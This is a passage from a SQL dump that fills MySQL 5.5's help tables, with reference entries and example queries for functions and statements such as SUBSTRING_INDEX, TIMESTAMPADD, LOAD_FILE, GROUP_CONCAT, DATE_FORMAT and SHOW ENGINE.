returns, a\nclient program can also obtain the number of rows affected for the\nfinal statement executed within the routine: At the SQL level, call the\nROW_COUNT() function; from the C API, call the mysql_affected_rows()\nfunction.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/call.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/call.html'),(339,'VALUES',14,'Syntax:\nVALUES(col_name)\n\nIn an INSERT ... ON DUPLICATE KEY UPDATE statement, you can use the\nVALUES(col_name) function in the UPDATE clause to refer to column\nvalues from the INSERT portion of the statement. In other words,\nVALUES(col_name) in the UPDATE clause refers to the value of col_name\nthat would be inserted, had no duplicate-key conflict occurred. This\nfunction is especially useful in multiple-row inserts. The VALUES()\nfunction is meaningful only in the ON DUPLICATE KEY UPDATE clause of\nINSERT statements and returns NULL otherwise. See\nhttp://dev.mysql.com/doc/refman/5.5/en/insert-on-duplicate.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','mysql> INSERT INTO table (a,b,c) VALUES (1,2,3),(4,5,6)\n -> ON DUPLICATE KEY UPDATE c=VALUES(a)+VALUES(b);\n','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(340,'MBRDISJOINT',7,'MBRDisjoint(g1,g2)\n\nReturns 1 or 0 to indicate whether the minimum bounding rectangles of\nthe two geometries g1 and g2 are disjoint (do not intersect).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html'),(341,'SUBSTRING_INDEX',38,'Syntax:\nSUBSTRING_INDEX(str,delim,count)\n\nReturns the substring from string str before count occurrences of the\ndelimiter delim. If count is positive, everything to the left of the\nfinal delimiter (counting from the left) is returned. If count is\nnegative, everything to the right of the final delimiter (counting from\nthe right) is returned. SUBSTRING_INDEX() performs a case-sensitive\nmatch when searching for delim.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', 2);\n -> \'www.mysql\'\nmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', -2);\n -> \'mysql.com\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(342,'ENCODE',12,'Syntax:\nENCODE(str,pass_str)\n\nEncrypt str using pass_str as the password. The result is a binary\nstring of the same length as str. To decrypt the result, use DECODE().\n\nThe ENCODE() function should no longer be used. If you still need to\nuse ENCODE(), a salt value must be used with it to reduce risk. For\nexample:\n\nENCODE(\'cleartext\', CONCAT(\'my_random_salt\',\'my_secret_password\'))\n\nA new random salt value must be used whenever a password is updated.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(343,'LOOP',24,'Syntax:\n[begin_label:] LOOP\n statement_list\nEND LOOP [end_label]\n\nLOOP implements a simple loop construct, enabling repeated execution of\nthe statement list, which consists of one or more statements, each\nterminated by a semicolon (;) statement delimiter. The statements\nwithin the loop are repeated until the loop is terminated. Usually,\nthis is accomplished with a LEAVE statement. Within a stored function,\nRETURN can also be used, which exits the function entirely.\n\nNeglecting to include a loop-termination statement results in an\ninfinite loop.\n\nA LOOP statement can be labeled. For the rules regarding label use, see\n[HELP labels].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/loop.html\n\n','CREATE PROCEDURE doiterate(p1 INT)\nBEGIN\n label1: LOOP\n SET p1 = p1 + 1;\n IF p1 < 10 THEN\n ITERATE label1;\n END IF;\n LEAVE label1;\n END LOOP label1;\n SET @x = p1;\nEND;\n','http://dev.mysql.com/doc/refman/5.5/en/loop.html'),(344,'TRUNCATE',3,'Syntax:\nTRUNCATE(X,D)\n\nReturns the number X, truncated to D decimal places. If D is 0, the\nresult has no decimal point or fractional part. D can be negative to\ncause D digits left of the decimal point of the value X to become zero.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT TRUNCATE(1.223,1);\n -> 1.2\nmysql> SELECT TRUNCATE(1.999,1);\n -> 1.9\nmysql> SELECT TRUNCATE(1.999,0);\n -> 1\nmysql> SELECT TRUNCATE(-1.999,1);\n -> -1.9\nmysql> SELECT TRUNCATE(122,-2);\n -> 100\nmysql> SELECT TRUNCATE(10.28*100,0);\n -> 1028\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(345,'TIMESTAMPADD',32,'Syntax:\nTIMESTAMPADD(unit,interval,datetime_expr)\n\nAdds the integer expression interval to the date or datetime expression\ndatetime_expr. The unit for interval is given by the unit argument,\nwhich should be one of the following values: MICROSECOND\n(microseconds), SECOND, MINUTE, HOUR, DAY, WEEK, MONTH, QUARTER, or\nYEAR.\n\nIt is possible to use FRAC_SECOND in place of MICROSECOND, but\nFRAC_SECOND is deprecated. FRAC_SECOND was removed in MySQL 5.5.3.\n\nThe unit value may be specified using one of keywords as shown, or with\na prefix of SQL_TSI_. For example, DAY and SQL_TSI_DAY both are legal.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT TIMESTAMPADD(MINUTE,1,\'2003-01-02\');\n -> \'2003-01-02 00:01:00\'\nmysql> SELECT TIMESTAMPADD(WEEK,1,\'2003-01-02\');\n -> \'2003-01-09\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(346,'SHOW',27,'SHOW has many forms that provide information about databases, tables,\ncolumns, or status information about the server. This section describes\nthose following:\n\nSHOW AUTHORS\nSHOW {BINARY | MASTER} LOGS\nSHOW BINLOG EVENTS [IN \'log_name\'] [FROM pos] [LIMIT [offset,] row_count]\nSHOW CHARACTER SET [like_or_where]\nSHOW COLLATION [like_or_where]\nSHOW [FULL] COLUMNS FROM tbl_name [FROM db_name] [like_or_where]\nSHOW CONTRIBUTORS\nSHOW CREATE DATABASE db_name\nSHOW CREATE EVENT event_name\nSHOW CREATE FUNCTION func_name\nSHOW CREATE PROCEDURE proc_name\nSHOW CREATE TABLE tbl_name\nSHOW CREATE TRIGGER trigger_name\nSHOW CREATE VIEW view_name\nSHOW DATABASES [like_or_where]\nSHOW ENGINE engine_name {STATUS | MUTEX}\nSHOW [STORAGE] ENGINES\nSHOW ERRORS [LIMIT [offset,] row_count]\nSHOW EVENTS\nSHOW FUNCTION CODE func_name\nSHOW FUNCTION STATUS [like_or_where]\nSHOW GRANTS FOR user\nSHOW INDEX FROM tbl_name [FROM db_name]\nSHOW MASTER STATUS\nSHOW OPEN TABLES [FROM db_name] [like_or_where]\nSHOW PLUGINS\nSHOW PROCEDURE CODE proc_name\nSHOW PROCEDURE STATUS [like_or_where]\nSHOW PRIVILEGES\nSHOW [FULL] PROCESSLIST\nSHOW PROFILE [types] [FOR QUERY n] [OFFSET n] [LIMIT n]\nSHOW PROFILES\nSHOW SLAVE HOSTS\nSHOW SLAVE STATUS\nSHOW [GLOBAL | SESSION] STATUS [like_or_where]\nSHOW TABLE STATUS [FROM db_name] [like_or_where]\nSHOW [FULL] TABLES [FROM db_name] [like_or_where]\nSHOW TRIGGERS [FROM db_name] [like_or_where]\nSHOW [GLOBAL | SESSION] VARIABLES [like_or_where]\nSHOW WARNINGS [LIMIT [offset,] row_count]\n\nlike_or_where:\n LIKE \'pattern\'\n | WHERE expr\n\nIf the syntax for a given SHOW statement includes a LIKE \'pattern\'\npart, \'pattern\' is a string that can contain the SQL \"%\" and \"_\"\nwildcard characters. The pattern is useful for restricting statement\noutput to matching values.\n\nSeveral SHOW statements also accept a WHERE clause that provides more\nflexibility in specifying which rows to display. See\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show.html'),(347,'GREATEST',20,'Syntax:\nGREATEST(value1,value2,...)\n\nWith two or more arguments, returns the largest (maximum-valued)\nargument. The arguments are compared using the same rules as for\nLEAST().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT GREATEST(2,0);\n -> 2\nmysql> SELECT GREATEST(34.0,3.0,5.0,767.0);\n -> 767.0\nmysql> SELECT GREATEST(\'B\',\'A\',\'C\');\n -> \'C\'\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(348,'SHOW VARIABLES',27,'Syntax:\nSHOW [GLOBAL | SESSION] VARIABLES\n [LIKE \'pattern\' | WHERE expr]\n\nSHOW VARIABLES shows the values of MySQL system variables (see\nhttp://dev.mysql.com/doc/refman/5.5/en/server-system-variables.html).\nThis statement does not require any privilege. It requires only the\nability to connect to the server.\n\nSystem variable information is also available from these sources:\n\no The GLOBAL_VARIABLES and SESSION_VARIABLES tables. See\n http://dev.mysql.com/doc/refman/5.5/en/variables-table.html.\n\no The mysqladmin variables command. See\n http://dev.mysql.com/doc/refman/5.5/en/mysqladmin.html.\n\nFor SHOW VARIABLES, a LIKE clause, if present, indicates which variable\nnames to match. A WHERE clause can be given to select rows using more\ngeneral conditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nSHOW VARIABLES accepts an optional GLOBAL or SESSION variable scope\nmodifier:\n\no With a GLOBAL modifier, the statement displays global system variable\n values. These are the values used to initialize the corresponding\n session variables for new connections to MySQL. As of MySQL 5.5.3, if\n a variable has no global value, no value is displayed. Before 5.5.3,\n the session value is displayed.\n\no With a SESSION modifier, the statement displays the system varaible\n values that are in effect for the current connection. If a variable\n has no session value, the global value is displayed. LOCAL is a\n synonym for SESSION.\n\no If no modifier is present, the default is SESSION.\n\nThe scope for each system variable is listed at\nhttp://dev.mysql.com/doc/refman/5.5/en/server-system-variables.html.\n\nSHOW VARIABLES is subject to a version-dependent display-width limit.\nFor variables with very long values that are not completely displayed,\nuse SELECT as a workaround. For example:\n\nSELECT @@GLOBAL.innodb_data_file_path;\n\nMost system variables can be set at server startup (read-only variables\nsuch as version_comment are exceptions). Many can be changed at runtime\nwith the SET statement. See\nhttp://dev.mysql.com/doc/refman/5.5/en/using-system-variables.html, and\n[HELP SET].\nWith a LIKE clause, the statement displays only rows for those\nvariables with names that match the pattern. To obtain the row for a\nspecific variable, use a LIKE clause as shown:\n\nSHOW VARIABLES LIKE \'max_join_size\';\nSHOW SESSION VARIABLES LIKE \'max_join_size\';\n\nTo get a list of variables whose name match a pattern, use the \"%\"\nwildcard character in a LIKE clause:\n\nSHOW VARIABLES LIKE \'%size%\';\nSHOW GLOBAL VARIABLES LIKE \'%size%\';\n\nWildcard characters can be used in any position within the pattern to\nbe matched. Strictly speaking, because \"_\" is a wildcard that matches\nany single character, you should escape it as \"\\_\" to match it\nliterally. In practice, this is rarely necessary.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-variables.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-variables.html'),(349,'BINLOG',27,'Syntax:\nBINLOG \'str\'\n\nBINLOG is an internal-use statement. It is generated by the mysqlbinlog\nprogram as the printable representation of certain events in binary log\nfiles. (See http://dev.mysql.com/doc/refman/5.5/en/mysqlbinlog.html.)\nThe \'str\' value is a base 64-encoded string the that server decodes to\ndetermine the data change indicated by the corresponding event. This\nstatement requires the SUPER privilege.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/binlog.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/binlog.html'),(350,'BIT_AND',16,'Syntax:\nBIT_AND(expr)\n\nReturns the bitwise AND of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(351,'SECOND',32,'Syntax:\nSECOND(time)\n\nReturns the second for time, in the range 0 to 59.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT SECOND(\'10:05:03\');\n -> 3\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(352,'AND',15,'Syntax:\nAND, &&\n\nLogical AND. Evaluates to 1 if all operands are nonzero and not NULL,\nto 0 if one or more operands are 0, otherwise NULL is returned.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/logical-operators.html\n\n','mysql> SELECT 1 AND 1;\n -> 1\nmysql> SELECT 1 AND 0;\n -> 0\nmysql> SELECT 1 AND NULL;\n -> NULL\nmysql> SELECT 0 AND NULL;\n -> 0\nmysql> SELECT NULL AND 0;\n -> 0\n','http://dev.mysql.com/doc/refman/5.5/en/logical-operators.html'),(353,'ATAN2',3,'Syntax:\nATAN(Y,X), ATAN2(Y,X)\n\nReturns the arc tangent of the two variables X and Y. It is similar to\ncalculating the arc tangent of Y / X, except that the signs of both\narguments are used to determine the quadrant of the result.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT ATAN(-2,2);\n -> -0.78539816339745\nmysql> SELECT ATAN2(PI(),0);\n -> 1.5707963267949\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(354,'MBRCONTAINS',7,'MBRContains(g1,g2)\n\nReturns 1 or 0 to indicate whether the minimum bounding rectangle of g1\ncontains the minimum bounding rectangle of g2. This tests the opposite\nrelationship as MBRWithin().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html\n\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Point(1 1)\');\nmysql> SELECT MBRContains(@g1,@g2), MBRWithin(@g2,@g1);\n+----------------------+--------------------+\n| MBRContains(@g1,@g2) | MBRWithin(@g2,@g1) |\n+----------------------+--------------------+\n| 1 | 1 |\n+----------------------+--------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html'),(355,'HOUR',32,'Syntax:\nHOUR(time)\n\nReturns the hour for time. The range of the return value is 0 to 23 for\ntime-of-day values. However, the range of TIME values actually is much\nlarger, so HOUR can return values greater than 23.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT HOUR(\'10:05:03\');\n -> 10\nmysql> SELECT HOUR(\'272:59:59\');\n -> 272\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(356,'SELECT',28,'Syntax:\nSELECT\n [ALL | DISTINCT | DISTINCTROW ]\n [HIGH_PRIORITY]\n [STRAIGHT_JOIN]\n [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]\n [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]\n select_expr [, select_expr ...]\n [FROM table_references\n [WHERE where_condition]\n [GROUP BY {col_name | expr | position}\n [ASC | DESC], ... [WITH ROLLUP]]\n [HAVING where_condition]\n [ORDER BY {col_name | expr | position}\n [ASC | DESC], ...]\n [LIMIT {[offset,] row_count | row_count OFFSET offset}]\n [PROCEDURE procedure_name(argument_list)]\n [INTO OUTFILE \'file_name\'\n [CHARACTER SET charset_name]\n export_options\n | INTO DUMPFILE \'file_name\'\n | INTO var_name [, var_name]]\n [FOR UPDATE | LOCK IN SHARE MODE]]\n\nSELECT is used to retrieve rows selected from one or more tables, and\ncan include UNION statements and subqueries. See [HELP UNION], and\nhttp://dev.mysql.com/doc/refman/5.5/en/subqueries.html.\n\nThe most commonly used clauses of SELECT statements are these:\n\no Each select_expr indicates a column that you want to retrieve. There\n must be at least one select_expr.\n\no table_references indicates the table or tables from which to retrieve\n rows. Its syntax is described in [HELP JOIN].\n\no The WHERE clause, if given, indicates the condition or conditions\n that rows must satisfy to be selected. where_condition is an\n expression that evaluates to true for each row to be selected. The\n statement selects all rows if there is no WHERE clause.\n\n In the WHERE expression, you can use any of the functions and\n operators that MySQL supports, except for aggregate (summary)\n functions. See\n http://dev.mysql.com/doc/refman/5.5/en/expressions.html, and\n http://dev.mysql.com/doc/refman/5.5/en/functions.html.\n\nSELECT can also be used to retrieve rows computed without reference to\nany table.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/select.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/select.html'),(357,'COT',3,'Syntax:\nCOT(X)\n\nReturns the cotangent of X.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT COT(12);\n -> -1.5726734063977\nmysql> SELECT COT(0);\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(358,'SHOW CREATE EVENT',27,'Syntax:\nSHOW CREATE EVENT event_name\n\nThis statement displays the CREATE EVENT statement needed to re-create\na given event. It requires the EVENT privilege for the database from\nwhich the event is to be shown. For example (using the same event\ne_daily defined and then altered in [HELP SHOW EVENTS]):\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-create-event.html\n\n','mysql> SHOW CREATE EVENT test.e_daily\\G\n*************************** 1. row ***************************\n Event: e_daily\n sql_mode:\n time_zone: SYSTEM\n Create Event: CREATE EVENT `e_daily`\n ON SCHEDULE EVERY 1 DAY\n STARTS CURRENT_TIMESTAMP + INTERVAL 6 HOUR\n ON COMPLETION NOT PRESERVE\n ENABLE\n COMMENT \'Saves total number of sessions then\n clears the table each day\'\n DO BEGIN\n INSERT INTO site_activity.totals (time, total)\n SELECT CURRENT_TIMESTAMP, COUNT(*)\n FROM site_activity.sessions;\n DELETE FROM site_activity.sessions;\n END\ncharacter_set_client: latin1\ncollation_connection: latin1_swedish_ci\n Database Collation: latin1_swedish_ci\n','http://dev.mysql.com/doc/refman/5.5/en/show-create-event.html'),(359,'OR',15,'Syntax:\nOR, ||\n\nLogical OR. When both operands are non-NULL, the result is 1 if any\noperand is nonzero, and 0 otherwise. With a NULL operand, the result is\n1 if the other operand is nonzero, and NULL otherwise. If both operands\nare NULL, the result is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/logical-operators.html\n\n','mysql> SELECT 1 OR 1;\n -> 1\nmysql> SELECT 1 OR 0;\n -> 1\nmysql> SELECT 0 OR 0;\n -> 0\nmysql> SELECT 0 OR NULL;\n -> NULL\nmysql> SELECT 1 OR NULL;\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/logical-operators.html'),(360,'LOAD_FILE',38,'Syntax:\nLOAD_FILE(file_name)\n\nReads the file and returns the file contents as a string. To use this\nfunction, the file must be located on the server host, you must specify\nthe full path name to the file, and you must have the FILE privilege.\nThe file must be readable by all and its size less than\nmax_allowed_packet bytes. If the secure_file_priv system variable is\nset to a nonempty directory name, the file to be loaded must be located\nin that directory.\n\nIf the file does not exist or cannot be read because one of the\npreceding conditions is not satisfied, the function returns NULL.\n\nThe character_set_filesystem system variable controls interpretation of\nfile names that are given as literal strings.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> UPDATE t\n SET blob_col=LOAD_FILE(\'/tmp/picture\')\n WHERE id=1;\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(361,'GROUP_CONCAT',16,'Syntax:\nGROUP_CONCAT(expr)\n\nThis function returns a string result with the concatenated non-NULL\nvalues from a group. It returns NULL if there are no non-NULL values.\nThe full syntax is as follows:\n\nGROUP_CONCAT([DISTINCT] expr [,expr ...]\n [ORDER BY {unsigned_integer | col_name | expr}\n [ASC | DESC] [,col_name ...]]\n [SEPARATOR str_val])\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','mysql> SELECT student_name,\n -> GROUP_CONCAT(test_score)\n -> FROM student\n -> GROUP BY student_name;\n','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(362,'POINTFROMTEXT',4,'PointFromText(wkt[,srid])\n\nConstructs a Point value using its WKT representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html'),(363,'DATE_FORMAT',32,'Syntax:\nDATE_FORMAT(date,format)\n\nFormats the date value according to the format string.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT DATE_FORMAT(\'2009-10-04 22:23:00\', \'%W %M %Y\');\n -> \'Sunday October 2009\'\nmysql> SELECT DATE_FORMAT(\'2007-10-04 22:23:00\', \'%H:%i:%s\');\n -> \'22:23:00\'\nmysql> SELECT DATE_FORMAT(\'1900-10-04 22:23:00\',\n -> \'%D %y %a %d %m %b %j\');\n -> \'4th 00 Thu 04 10 Oct 277\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n -> \'%H %k %I %r %T %S %w\');\n -> \'22 22 10 10:23:00 PM 22:23:00 00 6\'\nmysql> SELECT DATE_FORMAT(\'1999-01-01\', \'%X %V\');\n -> \'1998 52\'\nmysql> SELECT DATE_FORMAT(\'2006-06-00\', \'%d\');\n -> \'00\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(364,'BENCHMARK',17,'Syntax:\nBENCHMARK(count,expr)\n\nThe BENCHMARK() function executes the expression expr repeatedly count\ntimes. It may be used to time how quickly MySQL processes the\nexpression. The result value is always 0. The intended use is from\nwithin the mysql client, which reports query execution times:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\'));\n+----------------------------------------------+\n| BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\')) |\n+----------------------------------------------+\n| 0 |\n+----------------------------------------------+\n1 row in set (4.74 sec)\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(365,'YEAR',32,'Syntax:\nYEAR(date)\n\nReturns the year for date, in the range 1000 to 9999, or 0 for the\n\"zero\" date.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT YEAR(\'1987-01-01\');\n -> 1987\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(366,'SHOW ENGINE',27,'Syntax:\nSHOW ENGINE engine_name {STATUS | MUTEX}\n\nSHOW ENGINE displays operational information about a storage engine. It\nrequires the PROCESS privilege. The statement has these variants:\n\nSHOW ENGINE INNODB STATUS\nSHOW ENGINE INNODB MUTEX\nSHOW ENGINE {NDB | NDBCLUSTER} STATUS\nSHOW ENGINE PERFORMANCE_SCHEMA STATUS\n\nSHOW ENGINE INNODB STATUS displays extensive information from the\nstandard InnoDB Monitor about the state of the InnoDB storage engine.\nFor information about the standard monitor and other InnoDB Monitors\nthat provide information about InnoDB processing, see\nhttp://dev.mysql.com/doc/refman/5.5/en/innodb-monitors.html.\n\nSHOW ENGINE INNODB MUTEX displays InnoDB mutex and rw-lock statistics.\nStatement output has the following columns:\n\no Type\n\n Always InnoDB.\n\no Name\n\n The source file where the mutex is implemented, and the line number\n in the file where the mutex is created. The line number is specific\n to your version of MySQL.\n\no Status\n\n The mutex status. This field displays several values if UNIV_DEBUG\n was defined at MySQL compilation time (for example, in include/univ.i\n in the InnoDB part of the MySQL source tree). If UNIV_DEBUG was not\n defined, the statement displays only the os_waits value. In the\n latter case (without UNIV_DEBUG), the information on which the output\n is based is insufficient to distinguish regular mutexes and mutexes\n that protect rw-locks (which permit multiple readers or a single\n writer). Consequently, the output may appear to contain multiple rows\n for the same mutex.\n\n o count indicates how many times the mutex was requested.\n\n o spin_waits indicates how many times the spinlock had to run.\n\n o spin_rounds indicates the number of spinlock rounds. (spin_rounds\n divided by spin_waits provides the average round count.)\n\n o os_waits indicates the number of operating system waits. This\n occurs when the spinlock did not work (the mutex was not locked\n during the spinlock and it was necessary to yield to the operating\n system and wait).\n\n o os_yields indicates the number of times a thread trying to lock a\n mutex gave up its timeslice and yielded to the operating system (on\n the presumption that permitting other threads to run will free the\n mutex so that it can be locked).\n\n o os_wait_times indicates the amount of time (in ms) spent in\n operating system waits. In MySQL 5.5 timing is disabled and this\n value is always 0.\n\nAs of MySQL 5.5, SHOW ENGINE INNODB MUTEX skips the mutexes and\nrw-locks of buffer pool blocks, as the amount of output can be\noverwhelming on systems with a large buffer pool. (There is one mutex\nand one rw-lock in each 16K buffer pool block, and there are 65,536\nblocks per gigabyte.) SHOW ENGINE INNODB MUTEX also does not list any\nmutexes or rw-locks that have never been waited on (os_waits=0). Thus,\nSHOW ENGINE INNODB MUTEX only displays information about mutexes and\nrw-locks outside of the buffer pool that have caused at least one\nOS-level wait.\n\nSHOW ENGINE INNODB MUTEX information can be used to diagnose system\nproblems. For example, large values of spin_waits and spin_rounds may\nindicate scalability problems.\n\nUse SHOW ENGINE PERFORMANCE_SCHEMA STATUS to inspect the internal\noperation of the Performance Schema code:\n\nmysql> SHOW ENGINE PERFORMANCE_SCHEMA STATUS\\G\n...\n*************************** 3. row ***************************\n Type: performance_schema\n Name: events_waits_history.row_size\nStatus: 76\n*************************** 4. row ***************************\n Type: performance_schema\n Name: events_waits_history.row_count\nStatus: 10000\n*************************** 5. row ***************************\n Type: performance_schema\n Name: events_waits_history.memory\nStatus: 760000\n...\n*************************** 57. row ***************************\n Type: performance_schema\n Name: performance_schema.memory\nStatus: 26459600\n...\n\nThis statement is intended to help the DBA understand the effects that\ndifferent Performance Schema options have on memory requirements.\n\nName values consist of two parts, which name an internal buffer and a\nbuffer attribute, respectively. Interpret buffer names as follows:\n\no An internal buffer that is not exposed as a table is named within\n parentheses. Examples: (pfs_cond_class).row_size,\n (pfs_mutex_class).memory.\n\no An internal buffer that is exposed as a table in the\n performance_schema database is named after the table, without\n parentheses. Examples: events_waits_history.row_size,\n mutex_instances.row_count.\n\no A value that applies to the Performance Schema as a whole begins with\n performance_schema. Example: performance_schema.memory.\n\nBuffer attributes have these meanings:\n\no row_size is the size of the internal record used by the\n implementation, such as the size of a row in a table. row_size values\n cannot be changed.\n\no row_count is the number of internal records, such as the number of\n rows in a table. row_count values can be changed using Performance\n Schema configuration options.\n\no For a table, tbl_name.memory is the product of row_size and\n row_count. For the Performance Schema as a whole,\n performance_schema.memory is the sum of all the memory used (the sum\n of all other memory values).\n\nIn some cases, there is a direct relationship between a Performance\nSchema configuration parameter and a SHOW ENGINE value. For example,\nevents_waits_history_long.row_count corresponds to\nperformance_schema_events_waits_history_long_size. In other cases, the\nrelationship is more complex. For example,\nevents_waits_history.row_count corresponds to\nperformance_schema_events_waits_history_size (the number of rows per\nthread) multiplied by performance_schema_max_thread_instances ( the\nnumber of threads).\n\nIf the server has the NDBCLUSTER storage engine enabled, SHOW ENGINE\nNDB STATUS displays cluster status information such as the number of\nconnected data nodes, the cluster connectstring, and cluster binary log\nepochs, as well as counts of various Cluster API objects created by the\nMySQL Server when connected to the cluster. Sample output from this\nstatement is shown here:\n\nmysql> SHOW ENGINE NDB STATUS;\n+------------+-----------------------+--------------------------------------------------+\n| Type | Name | Status |\n+------------+-----------------------+--------------------------------------------------+\n| ndbcluster | connection | cluster_node_id=7,\n connected_host=192.168.0.103, connected_port=1186, number_of_data_nodes=4,\n number_of_ready_data_nodes=3, connect_count=0 |\n| ndbcluster | NdbTransaction | created=6, free=0, sizeof=212 |\n| ndbcluster | NdbOperation | created=8, free=8, sizeof=660 |\n| ndbcluster | NdbIndexScanOperation | created=1, free=1, sizeof=744 |\n| ndbcluster | NdbIndexOperation | created=0, free=0, sizeof=664 |\n| ndbcluster | NdbRecAttr | created=1285, free=1285, sizeof=60 |\n| ndbcluster | NdbApiSignal | created=16, free=16, sizeof=136 |\n| ndbcluster | NdbLabel | created=0, free=0, sizeof=196 |\n| ndbcluster | NdbBranch | created=0, free=0, sizeof=24 |\n| ndbcluster | NdbSubroutine | created=0, free=0, sizeof=68 |\n| ndbcluster | NdbCall | created=0, free=0, sizeof=16 |\n| ndbcluster | NdbBlob | created=1, free=1, sizeof=264 |\n| ndbcluster | NdbReceiver | created=4, free=0, sizeof=68 |\n| ndbcluster | binlog | latest_epoch=155467, latest_trans_epoch=148126,\n latest_received_binlog_epoch=0, latest_handled_binlog_epoch=0,\n latest_applied_binlog_epoch=0 |\n+------------+-----------------------+--------------------------------------------------+\n\nThe rows with connection and binlog in the Name column were added to\nthe output of this statement in MySQL 5.1. The Status column in each of\nthese rows provides information about the MySQL server\'s connection to\nthe cluster and about the cluster binary log\'s status, respectively.\nThe Status information is in the form of comma-delimited set of\nname/value pairs.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-engine.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-engine.html'),(367,'NAME_CONST',14,'Syntax:\nNAME_CONST(name,value)\n\nReturns the given value. When used to produce a result set column,\nNAME_CONST() causes the column to have the given name. The arguments\nshould be constants.\n\nmysql> SELECT NAME_CONST(\'myname\', 14);\n+--------+\n| myname |\n+--------+\n| 14 |\n+--------+\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(368,'RELEASE_LOCK',14,'Syntax:\nRELEASE_LOCK(str)\n\nReleases the lock named by the string str that was obtained with\nGET_LOCK(). Returns 1 if the lock was released, 0 if the lock was not\nestablished by this thread (in which case the lock is not released),\nand NULL if the named lock did not exist. The lock does not exist if it\nwas never obtained by a call to GET_LOCK() or if it has previously been\nreleased.\n\nThe DO statement is convenient to use with RELEASE_LOCK(). See [HELP\nDO].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(369,'IS NULL',20,'Syntax:\nIS NULL\n\nTests whether a value is NULL.\n\nURL: 